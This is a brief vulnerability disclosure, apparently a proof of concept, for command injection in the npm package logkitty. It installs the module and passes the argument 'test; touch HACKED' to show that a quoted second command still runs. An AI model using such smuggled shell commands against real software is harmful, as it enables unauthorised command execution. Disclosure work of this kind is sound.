The issue occurs because a
user input is formatted inside a
command that will be executed without any check.
npm i logkitty # Install affected module logkitty android app 'test; touch HACKED' # Note the *touch command* is inside the *'* (single quote), so it's an argument, while it will be executed anyway
HACKEDhas been created